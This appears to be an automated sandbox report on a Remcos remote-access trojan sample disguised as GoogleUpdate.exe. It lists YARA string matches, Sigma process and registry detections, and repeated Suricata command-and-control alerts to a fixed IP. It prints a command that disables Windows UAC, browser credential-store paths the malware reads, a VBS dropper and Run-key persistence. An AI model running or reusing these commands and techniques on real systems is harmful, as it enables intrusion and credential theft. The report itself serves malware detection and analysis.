0.2.DB5rQYsfd6.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
0.2.DB5rQYsfd6.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
10.0.GoogleUpdate.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.0.GoogleUpdate.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
10.0.GoogleUpdate.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
20.0.GoogleUpdate.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
20.0.GoogleUpdate.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
10.0.GoogleUpdate.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
20.0.GoogleUpdate.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
20.0.GoogleUpdate.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
25.2.GoogleUpdate.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
25.2.GoogleUpdate.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
25.2.GoogleUpdate.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
25.2.GoogleUpdate.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
10.2.GoogleUpdate.exe.6abe60.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.GoogleUpdate.exe.6abe60.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x661e0:$a1: Remcos restarted by watchdog! 0x66738:$a3: %02i:%02i:%02i:%03i 0x66abd:$a4: * Remcos v
10.2.GoogleUpdate.exe.6abe60.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x611e4:$str_a1: C:\Windows\System32\cmd.exe 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6020c:$str_b2: Executing file: 0x61328:$str_b3: GetDirectListeningPort 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60e30:$str_b7: \update.vbs 0x60234:$str_b9: Downloaded file: 0x60220:$str_b10: Downloading file: 0x602c4:$str_b12: Failed to upload file: 0x612f0:$str_b13: StartForward 0x61310:$str_b14: StopForward 0x60dd8:$str_b15: fso.DeleteFile " 0x60d6c:$str_b16: On Error Resume Next 0x60e08:$str_b17: fso.DeleteFolder " 0x602b4:$str_b18: Uploaded file: 0x60274:$str_b19: Unable to delete: 0x60da0:$str_b20: while fso.FileExists(" 0x60749:$str_c0: [Firefox StoredLogins not found]
10.2.GoogleUpdate.exe.6abe60.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60100:$s1: \Classes\mscfile\shell\open\command 0x60160:$s1: \Classes\mscfile\shell\open\command 0x60148:$s2: eventvwr.exe
10.2.GoogleUpdate.exe.2a00000.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.GoogleUpdate.exe.2a00000.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
10.2.GoogleUpdate.exe.2a00000.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
10.2.GoogleUpdate.exe.2a00000.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
18.2.GoogleUpdate.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
18.2.GoogleUpdate.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
18.2.GoogleUpdate.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
18.2.GoogleUpdate.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
10.2.GoogleUpdate.exe.6abe60.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.GoogleUpdate.exe.6abe60.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
10.2.GoogleUpdate.exe.6abe60.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
10.2.GoogleUpdate.exe.6abe60.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
Click to see the 83 entries

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious GoogleUpdate Child Process

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, CommandLine: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentImage: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentProcessId: 7888, ParentProcessName: GoogleUpdate.exe, ProcessCommandLine: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, ProcessId: 7904, ProcessName: cmd.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DB5rQYsfd6.exe", ParentImage: C:\Users\user\Desktop\DB5rQYsfd6.exe, ParentProcessId: 7308, ParentProcessName: DB5rQYsfd6.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7420, ProcessName: wscript.exe

Sigma detected: Suspect Svchost Activity

Source: Process started

Author: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentImage: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentProcessId: 7888, ParentProcessName: GoogleUpdate.exe, ProcessCommandLine: svchost.exe, ProcessId: 7944, ProcessName: svchost.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DB5rQYsfd6.exe", ParentImage: C:\Users\user\Desktop\DB5rQYsfd6.exe, ParentProcessId: 7308, ParentProcessName: DB5rQYsfd6.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7420, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DB5rQYsfd6.exe", ParentImage: C:\Users\user\Desktop\DB5rQYsfd6.exe, ParentProcessId: 7308, ParentProcessName: DB5rQYsfd6.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7420, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\GoogleDat\GoogleUpdate.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DB5rQYsfd6.exe, ProcessId: 7308, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentImage: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentProcessId: 7888, ParentProcessName: GoogleUpdate.exe, ProcessCommandLine: svchost.exe, ProcessId: 7944, ProcessName: svchost.exe

Sigma detected: Unusual Parent Process For Cmd.EXE

Source: Process started

Author: Tim Rauch: Data: Command: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, CommandLine: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentImage: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentProcessId: 7888, ParentProcessName: GoogleUpdate.exe, ProcessCommandLine: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, ProcessId: 7904, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DB5rQYsfd6.exe", ParentImage: C:\Users\user\Desktop\DB5rQYsfd6.exe, ParentProcessId: 7308, ParentProcessName: DB5rQYsfd6.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7420, ProcessName: wscript.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\GoogleDat\GoogleUpdate.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DB5rQYsfd6.exe, ProcessId: 7308, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentImage: C:\ProgramData\GoogleDat\GoogleUpdate.exe, ParentProcessId: 7888, ParentProcessName: GoogleUpdate.exe, ProcessCommandLine: svchost.exe, ProcessId: 7944, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Remcos 3.x Unencrypted Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T20:06:59.266497+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49732	198.50.242.157	443	TCP
2025-01-11T20:07:00.309527+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49734	198.50.242.157	443	TCP
2025-01-11T20:07:01.318590+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49735	198.50.242.157	443	TCP
2025-01-11T20:07:02.397228+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49737	198.50.242.157	443	TCP
2025-01-11T20:07:03.399869+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49739	198.50.242.157	443	TCP
2025-01-11T20:07:04.414344+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49740	198.50.242.157	443	TCP
2025-01-11T20:07:05.448168+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49741	198.50.242.157	443	TCP
2025-01-11T20:07:06.465323+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49742	198.50.242.157	443	TCP
2025-01-11T20:07:07.480680+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49743	198.50.242.157	443	TCP
2025-01-11T20:07:08.494840+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49744	198.50.242.157	443	TCP
2025-01-11T20:07:09.537509+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49745	198.50.242.157	443	TCP
2025-01-11T20:07:10.554086+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49746	198.50.242.157	443	TCP
2025-01-11T20:07:11.569699+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49747	198.50.242.157	443	TCP
2025-01-11T20:07:12.585073+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49748	198.50.242.157	443	TCP
2025-01-11T20:07:13.600743+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49749	198.50.242.157	443	TCP
2025-01-11T20:07:14.632838+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49751	198.50.242.157	443	TCP
2025-01-11T20:07:15.757004+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49755	198.50.242.157	443	TCP
2025-01-11T20:07:16.773532+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49757	198.50.242.157	443	TCP
2025-01-11T20:07:17.788117+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49759	198.50.242.157	443	TCP
2025-01-11T20:07:18.803624+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49760	198.50.242.157	443	TCP
2025-01-11T20:07:19.819483+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49761	198.50.242.157	443	TCP
2025-01-11T20:07:20.834935+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49762	198.50.242.157	443	TCP
2025-01-11T20:07:21.850624+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49763	198.50.242.157	443	TCP
2025-01-11T20:07:22.866137+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49764	198.50.242.157	443	TCP
2025-01-11T20:07:23.887024+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49765	198.50.242.157	443	TCP
2025-01-11T20:07:24.928755+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49766	198.50.242.157	443	TCP
2025-01-11T20:07:25.944710+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49767	198.50.242.157	443	TCP
2025-01-11T20:07:26.960713+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49768	198.50.242.157	443	TCP
2025-01-11T20:07:27.976225+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49769	198.50.242.157	443	TCP
2025-01-11T20:07:28.991401+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49770	198.50.242.157	443	TCP
2025-01-11T20:07:30.007408+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49771	198.50.242.157	443	TCP
2025-01-11T20:07:31.038067+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49772	198.50.242.157	443	TCP
2025-01-11T20:07:32.053765+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49773	198.50.242.157	443	TCP
2025-01-11T20:07:33.022685+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49774	198.50.242.157	443	TCP
2025-01-11T20:07:33.960000+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49775	198.50.242.157	443	TCP
2025-01-11T20:07:34.866131+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49776	198.50.242.157	443	TCP
2025-01-11T20:07:35.756966+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49777	198.50.242.157	443	TCP
2025-01-11T20:07:36.620872+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49778	198.50.242.157	443	TCP
2025-01-11T20:07:37.444263+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.4	49779	198.50.242.157	443	TCP
